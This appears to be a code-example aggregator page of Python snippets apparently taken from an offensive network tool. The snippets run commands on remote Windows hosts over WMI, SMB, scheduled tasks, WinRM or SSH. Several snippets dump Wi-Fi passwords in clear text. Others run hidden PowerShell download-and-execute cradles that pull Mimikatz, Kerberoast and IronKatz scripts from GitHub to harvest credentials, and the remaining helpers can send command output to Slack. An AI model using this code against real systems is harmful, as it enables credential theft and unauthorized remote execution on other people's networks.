Пример #1
0
    def run(self, target, args, smb_con, loggers):
        profiles = []
        logger = loggers['console']

        try:
            if args.exec_method == 'wmiexec':
                executioner = WMIEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)
            elif args.exec_method == 'smbexec':
                executioner = SMBEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)

            # Quick n dirty error checking...
            results = executioner.execute(
                'netsh wlan show profiles').splitlines()
            if len(results) <= 1:
                logger.fail([
                    smb_con.host, smb_con.ip,
                    self.name.upper(), "{}: {}".format(self.name, results[0])
                ])
                return

            # List all profiles
            for r in results:
                if r.strip().startswith('All User Profile'):
                    try:
                        wifi = r.strip().split(":")[1]
                        profiles.append(wifi.lstrip().rstrip())
                    except:
                        pass

            # Get clear text passwords
            for p in profiles:
                try:
                    for result in executioner.execute(
                            'netsh wlan show profile name=\"{}\" key=clear'.
                            format(p)).splitlines():
                        if result.split(":")[0].strip() in [
                                'SSID name', 'Authentication', 'Cipher',
                                'Key Content'
                        ]:
                            logger.success([
                                smb_con.host, smb_con.ip,
                                self.name.upper(),
                                result.lstrip()
                            ])
                except Exception as e:
                    logger.debug([
                        smb_con.host, smb_con.ip,
                        self.name.upper(), "{}: {}".format(self.name, str(e))
                    ])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
Пример #2
0
    def run(self, target, args, smb_con, loggers):
        logger = loggers['console']
        try:
            if args.exec_method == 'wmiexec':
                executioner = WMIEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)
            elif args.exec_method == 'smbexec':
                executioner = SMBEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)

            for result in executioner.execute(
                    'powershell -exec bypass -noni -nop -W hidden -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1\');"'
            ).splitlines():
                logger.info(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), result])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
Пример #3
0
    def run(self, target, args, smb_con, loggers, config_obj):
        logger = loggers['console']
        # Again super lazy way of powershell execution need to redo
        try:
            if args.exec_method == 'wmiexec':
                executioner = WMIEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)
            elif args.exec_method == 'smbexec':
                executioner = SMBEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)

            for result in executioner.execute(
                    'powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1\');Invoke-kerberoast -OutputFormat Hashcat"'
            ).splitlines():
                logger.info(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), result])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
Пример #4
0
    def run(self, target, args, smb_con, loggers):
        logger = loggers['console']
        # Again super lazy way of powershell execution need to redo
        try:
            if args.exec_method == 'wmiexec':
                executioner = WMIEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)
            elif args.exec_method == 'smbexec':
                executioner = SMBEXEC(logger,
                                      target,
                                      args,
                                      smb_con,
                                      share_name=args.fileless_sharename)

            for result in executioner.execute(
                    'powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1\');"'
            ).splitlines():
                logger.info(
                    [smb_con.host, smb_con.ip,
                     self.name.upper(), result])

        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
Пример #5
0
def code_execution(con, args, target, loggers, config_obj, cmd=None, return_data=False):
    # Used as the primary execution function for ps_execute and all modules.

    # Get payload to execute
    if cmd != None:
        payload = cmd
    else:
        payload = args.execute

    # Implement Execution Method
    if args.exec_method == 'wmiexec':
        executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method == 'smbexec':
        executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)

    # Log action to file
    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, payload))

    # Spawn thread for code execution timeout
    timer = ExecutionTimeout(executioner, payload)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout+5)

    # CMD Output
    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, payload, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)

    # Return to module not print
    if return_data:
        return timer.result

    for line in timer.result.splitlines():
        loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])
Пример #6
0
def code_execution(con, args, target, loggers, config_obj):
    if args.exec_method == 'wmiexec':
        executioner = WMIEXEC(loggers['console'],
                              target,
                              args,
                              con,
                              share_name=args.fileless_sharename)
    elif args.exec_method == 'smbexec':
        executioner = SMBEXEC(loggers['console'],
                              target,
                              args,
                              con,
                              share_name=args.fileless_sharename)

    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(
        target, args.domain, args.user, args.execute))
    timer = ExecutionTimeout(executioner, args.execute)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout + 3)  # Account for sleep timer in exec class

    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(
            con.host, args.user, args.execute, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)

    for line in timer.result.splitlines():
        loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])
Пример #7
0
    def cmd_execution(self, cmd):
        self.filer.info("Command Execution\t{}\t{}\\{}\t{}".format(
            self.host, self.smbcon.ip, self.username, cmd))
        if self.exec_method.lower() == 'wmiexec':
            self.executioner = WMIEXEC(self.logger,
                                       self.host,
                                       self.args,
                                       self.smbcon,
                                       share_name=self.sharename)

        elif self.exec_method.lower() == 'smbexec':
            self.executioner = SMBEXEC(self.logger,
                                       self.host,
                                       self.args,
                                       self.smbcon,
                                       share_name=self.sharename)

        elif self.exec_method.lower() == 'atexec':
            self.executioner = TSCHEXEC(self.logger,
                                        self.host,
                                        self.args,
                                        self.smbcon,
                                        share_name=self.sharename)

        elif self.exec_method.lower() == 'winrm':
            self.executioner = WINRM(self.logger, self.host, self.args,
                                     self.smbcon)

        self.output = self.executioner.execute(cmd).splitlines()
Пример #8
0
def code_execution(con,
                   args,
                   target,
                   loggers,
                   config_obj,
                   payload,
                   return_data=False):
    # Implement Execution Method
    if args.exec_method.lower() == 'wmiexec':
        executioner = WMIEXEC(loggers['console'],
                              target,
                              args,
                              con,
                              share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'smbexec':
        executioner = SMBEXEC(loggers['console'],
                              target,
                              args,
                              con,
                              share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'atexec':
        executioner = TSCHEXEC(loggers['console'],
                               target,
                               args,
                               con,
                               share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'winrm':
        executioner = WINRM(loggers['console'],
                            target,
                            args,
                            con,
                            share_name=False)
    elif args.exec_method.lower() == 'ssh':
        executioner = con
    # Log action to file
    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(
        target, args.domain, args.user, payload))

    # Spawn thread for code execution timeout
    timer = ExecutionTimeout(executioner, payload)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout + 5)
    exe_thread.running = False

    # CMD Output
    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(
            con.host, args.user, payload, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)

    # Return to module not print
    if return_data:
        return timer.result

    for line in timer.result.splitlines():
        loggers['console'].info(
            [con.host, con.ip,
             args.exec_method.upper(), line])